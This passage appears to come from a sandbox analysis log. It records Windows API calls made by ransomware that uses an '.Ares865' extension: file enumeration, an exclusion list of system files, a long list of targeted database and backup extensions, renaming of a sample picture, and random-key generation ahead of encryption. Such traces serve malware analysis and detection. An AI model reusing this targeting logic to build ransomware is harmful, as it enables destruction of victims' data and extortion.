(in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0046.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0046.684] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0046.691] CloseHandle (hObject=0x12c) returned 1 [0046.691] CloseHandle (hObject=0x164) returned 1 [0046.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb490 | out: hHeap=0x2b0000) returned 1 [0046.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0046.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0046.709] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="aoldtz.exe") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="..") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="windows") returned -1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="bootmgr") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="temp") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="pagefile.sys") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="boot") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="ids.txt") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="ntuser.dat") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="perflogs") returned 1 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2="MSBuild") returned 1 [0046.710] lstrlenW (lpString="Tulips.jpg") returned 10 [0046.710] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 53 [0046.710] lstrcpyW (in: lpString1=0x2cce452, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0046.710] lstrlenW (lpString="Tulips.jpg") returned 10 [0046.710] lstrlenW (lpString="Ares865") returned 7 [0046.710] lstrcmpiW (lpString1="ips.jpg", lpString2="Ares865") returned 1 [0046.710] lstrlenW (lpString=".dll") returned 4 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".dll") returned 1 [0046.710] lstrlenW (lpString=".lnk") returned 4 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".lnk") returned 1 [0046.710] lstrlenW (lpString=".ini") returned 4 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".ini") returned 1 [0046.710] lstrlenW (lpString=".sys") returned 4 [0046.710] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".sys") returned 1 [0046.710] lstrlenW (lpString="Tulips.jpg") returned 10 [0046.710] lstrlenW (lpString="bak") returned 3 [0046.710] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0046.710] lstrlenW (lpString="ba_") returned 3 [0046.710] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0046.710] lstrlenW (lpString="dbb") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0046.711] lstrlenW (lpString="vmdk") returned 4 [0046.711] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0046.711] lstrlenW (lpString="rar") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0046.711] lstrlenW (lpString="zip") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0046.711] lstrlenW (lpString="tgz") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0046.711] lstrlenW (lpString="vbox") returned 4 [0046.711] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0046.711] lstrlenW (lpString="vdi") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0046.711] lstrlenW (lpString="vhd") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0046.711] lstrlenW (lpString="vhdx") returned 4 [0046.711] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0046.711] lstrlenW (lpString="avhd") returned 4 [0046.711] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0046.711] lstrlenW (lpString="db") returned 2 [0046.711] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0046.711] lstrlenW (lpString="db2") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0046.711] lstrlenW (lpString="db3") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0046.711] lstrlenW (lpString="dbf") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0046.711] lstrlenW (lpString="mdf") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0046.711] lstrlenW (lpString="mdb") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0046.711] lstrlenW (lpString="sql") returned 3 [0046.711] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0046.711] lstrlenW (lpString="sqlite") returned 6 [0046.711] lstrcmpiW (lpString1="ps.jpg", lpString2="sqlite") returned -1 [0046.711] lstrlenW (lpString="sqlite3") returned 7 [0046.711] lstrcmpiW (lpString1="ips.jpg", lpString2="sqlite3") returned -1 [0046.711] lstrlenW (lpString="sqlitedb") returned 8 [0046.712] lstrcmpiW (lpString1="lips.jpg", lpString2="sqlitedb") returned -1 [0046.712] lstrlenW (lpString="xml") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0046.712] lstrlenW (lpString="$er") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0046.712] lstrlenW (lpString="4dd") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0046.712] lstrlenW (lpString="4dl") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0046.712] lstrlenW (lpString="^^^") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0046.712] lstrlenW (lpString="abs") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0046.712] lstrlenW (lpString="abx") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0046.712] lstrlenW (lpString="accdb") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0046.712] lstrlenW (lpString="accdc") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0046.712] lstrlenW (lpString="accde") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0046.712] lstrlenW (lpString="accdr") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0046.712] lstrlenW (lpString="accdt") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0046.712] lstrlenW (lpString="accdw") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0046.712] lstrlenW (lpString="accft") returned 5 [0046.712] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0046.712] lstrlenW (lpString="adb") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.712] lstrlenW (lpString="adb") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0046.712] lstrlenW (lpString="ade") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0046.712] lstrlenW (lpString="adf") returned 3 [0046.712] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0046.713] lstrlenW (lpString="adn") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0046.713] lstrlenW (lpString="adp") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0046.713] lstrlenW (lpString="alf") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0046.713] lstrlenW (lpString="ask") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0046.713] lstrlenW (lpString="btr") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0046.713] lstrlenW (lpString="cat") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0046.713] lstrlenW (lpString="cdb") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0046.713] lstrlenW (lpString="ckp") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0046.713] lstrlenW (lpString="cma") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0046.713] lstrlenW (lpString="cpd") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0046.713] lstrlenW (lpString="dacpac") returned 6 [0046.713] lstrcmpiW (lpString1="ps.jpg", lpString2="dacpac") returned 1 [0046.713] lstrlenW (lpString="dad") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0046.713] lstrlenW (lpString="dadiagrams") returned 10 [0046.713] lstrlenW (lpString="daschema") returned 8 [0046.713] lstrcmpiW (lpString1="lips.jpg", lpString2="daschema") returned 1 [0046.713] lstrlenW (lpString="db-journal") returned 10 [0046.713] lstrlenW (lpString="db-shm") returned 6 [0046.713] lstrcmpiW (lpString1="ps.jpg", lpString2="db-shm") returned 1 [0046.713] lstrlenW (lpString="db-wal") returned 6 [0046.713] lstrcmpiW (lpString1="ps.jpg", lpString2="db-wal") returned 1 [0046.713] lstrlenW (lpString="dbc") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0046.713] lstrlenW (lpString="dbs") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0046.713] lstrlenW (lpString="dbt") returned 3 [0046.713] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0046.714] lstrlenW (lpString="dbv") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0046.714] lstrlenW (lpString="dbx") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0046.714] lstrlenW (lpString="dcb") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0046.714] lstrlenW (lpString="dct") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0046.714] lstrlenW (lpString="dcx") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0046.714] lstrlenW (lpString="ddl") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0046.714] lstrlenW (lpString="dlis") returned 4 [0046.714] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0046.714] lstrlenW (lpString="dp1") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0046.714] lstrlenW (lpString="dqy") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0046.714] lstrlenW (lpString="dsk") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0046.714] lstrlenW (lpString="dsn") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0046.714] lstrlenW (lpString="dtsx") returned 4 [0046.714] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0046.714] lstrlenW (lpString="dxl") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0046.714] lstrlenW (lpString="eco") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0046.714] lstrlenW (lpString="ecx") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0046.714] lstrlenW (lpString="edb") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0046.714] lstrlenW (lpString="epim") returned 4 [0046.714] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0046.714] lstrlenW (lpString="fcd") returned 3 [0046.714] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0046.714] lstrlenW (lpString="fdb") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0046.715] lstrlenW (lpString="fic") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0046.715] lstrlenW (lpString="flexolibrary") returned 12 [0046.715] lstrlenW (lpString="fm5") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0046.715] lstrlenW (lpString="fmp") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0046.715] lstrlenW (lpString="fmp12") returned 5 [0046.715] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0046.715] lstrlenW (lpString="fmpsl") returned 5 [0046.715] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0046.715] lstrlenW (lpString="fol") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0046.715] lstrlenW (lpString="fp3") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0046.715] lstrlenW (lpString="fp4") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0046.715] lstrlenW (lpString="fp5") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0046.715] lstrlenW (lpString="fp7") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0046.715] lstrlenW (lpString="fpt") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0046.715] lstrlenW (lpString="frm") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0046.715] lstrlenW (lpString="gdb") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.715] lstrlenW (lpString="gdb") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0046.715] lstrlenW (lpString="grdb") returned 4 [0046.715] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0046.715] lstrlenW (lpString="gwi") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0046.715] lstrlenW (lpString="hdb") returned 3 [0046.715] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0046.715] lstrlenW (lpString="his") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0046.716] lstrlenW (lpString="ib") returned 2 [0046.716] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0046.716] lstrlenW (lpString="idb") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0046.716] lstrlenW (lpString="ihx") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0046.716] lstrlenW (lpString="itdb") returned 4 [0046.716] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0046.716] lstrlenW (lpString="itw") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0046.716] lstrlenW (lpString="jet") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0046.716] lstrlenW (lpString="jtx") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0046.716] lstrlenW (lpString="kdb") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0046.716] lstrlenW (lpString="kexi") returned 4 [0046.716] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0046.716] lstrlenW (lpString="kexic") returned 5 [0046.716] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0046.716] lstrlenW (lpString="kexis") returned 5 [0046.716] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0046.716] lstrlenW (lpString="lgc") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0046.716] lstrlenW (lpString="lwx") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0046.716] lstrlenW (lpString="maf") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0046.716] lstrlenW (lpString="maq") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0046.716] lstrlenW (lpString="mar") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0046.716] lstrlenW (lpString="marshal") returned 7 [0046.716] lstrcmpiW (lpString1="ips.jpg", lpString2="marshal") returned -1 [0046.716] lstrlenW (lpString="mas") returned 3 [0046.716] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0046.717] lstrlenW (lpString="mav") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0046.717] lstrlenW (lpString="maw") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0046.717] lstrlenW (lpString="mdbhtml") returned 7 [0046.717] lstrcmpiW (lpString1="ips.jpg", lpString2="mdbhtml") returned -1 [0046.717] lstrlenW (lpString="mdn") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0046.717] lstrlenW (lpString="mdt") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0046.717] lstrlenW (lpString="mfd") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0046.717] lstrlenW (lpString="mpd") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0046.717] lstrlenW (lpString="mrg") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0046.717] lstrlenW (lpString="mud") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0046.717] lstrlenW (lpString="mwb") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0046.717] lstrlenW (lpString="myd") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0046.717] lstrlenW (lpString="ndf") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0046.717] lstrlenW (lpString="nnt") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0046.717] lstrlenW (lpString="nrmlib") returned 6 [0046.717] lstrcmpiW (lpString1="ps.jpg", lpString2="nrmlib") returned 1 [0046.717] lstrlenW (lpString="ns2") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0046.717] lstrlenW (lpString="ns3") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0046.717] lstrlenW (lpString="ns4") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0046.717] lstrlenW (lpString="nsf") returned 3 [0046.717] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0046.717] lstrlenW (lpString="nv") returned 2 [0046.717] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0046.718] lstrlenW (lpString="nv2") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0046.718] lstrlenW (lpString="nwdb") returned 4 [0046.718] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0046.718] lstrlenW (lpString="nyf") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0046.718] lstrlenW (lpString="odb") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.718] lstrlenW (lpString="odb") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0046.718] lstrlenW (lpString="oqy") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0046.718] lstrlenW (lpString="ora") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0046.718] lstrlenW (lpString="orx") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0046.718] lstrlenW (lpString="owc") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0046.718] lstrlenW (lpString="p96") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0046.718] lstrlenW (lpString="p97") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0046.718] lstrlenW (lpString="pan") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0046.718] lstrlenW (lpString="pdb") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0046.718] lstrlenW (lpString="pdm") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0046.718] lstrlenW (lpString="pnz") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0046.718] lstrlenW (lpString="qry") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0046.718] lstrlenW (lpString="qvd") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0046.718] lstrlenW (lpString="rbf") returned 3 [0046.718] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0046.718] lstrlenW (lpString="rctd") returned 4 [0046.719] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0046.719] lstrlenW (lpString="rod") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0046.719] lstrlenW (lpString="rodx") returned 4 [0046.719] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0046.719] lstrlenW (lpString="rpd") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0046.719] lstrlenW (lpString="rsd") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0046.719] lstrlenW (lpString="sas7bdat") returned 8 [0046.719] lstrcmpiW (lpString1="lips.jpg", lpString2="sas7bdat") returned -1 [0046.719] lstrlenW (lpString="sbf") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0046.719] lstrlenW (lpString="scx") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0046.719] lstrlenW (lpString="sdb") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0046.719] lstrlenW (lpString="sdc") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0046.719] lstrlenW (lpString="sdf") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0046.719] lstrlenW (lpString="sis") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0046.719] lstrlenW (lpString="spq") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0046.719] lstrlenW (lpString="te") returned 2 [0046.719] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0046.719] lstrlenW (lpString="teacher") returned 7 [0046.719] lstrcmpiW (lpString1="ips.jpg", lpString2="teacher") returned -1 [0046.719] lstrlenW (lpString="tmd") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0046.719] lstrlenW (lpString="tps") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0046.719] lstrlenW (lpString="trc") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.719] lstrlenW (lpString="trc") returned 3 [0046.719] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0046.720] lstrlenW (lpString="trm") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0046.720] lstrlenW (lpString="udb") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0046.720] lstrlenW (lpString="udl") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0046.720] lstrlenW (lpString="usr") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0046.720] lstrlenW (lpString="v12") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0046.720] lstrlenW (lpString="vis") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0046.720] lstrlenW (lpString="vpd") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0046.720] lstrlenW (lpString="vvv") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0046.720] lstrlenW (lpString="wdb") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0046.720] lstrlenW (lpString="wmdb") returned 4 [0046.720] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0046.720] lstrlenW (lpString="wrk") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0046.720] lstrlenW (lpString="xdb") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0046.720] lstrlenW (lpString="xld") returned 3 [0046.720] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0046.720] lstrlenW (lpString="xmlff") returned 5 [0046.720] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0046.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Ares865") returned 59 [0046.720] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.ares865"), dwFlags=0x1) returned 1 [0046.721] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0046.721] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=620888) returned 1 [0046.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0046.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb18 [0046.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0046.721] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0046.722] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0046.722] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.722] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x97c60, lpName=0x0) returned 0x12c [0046.726] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97c60) returned 0xb80000 [0046.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0046.955] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 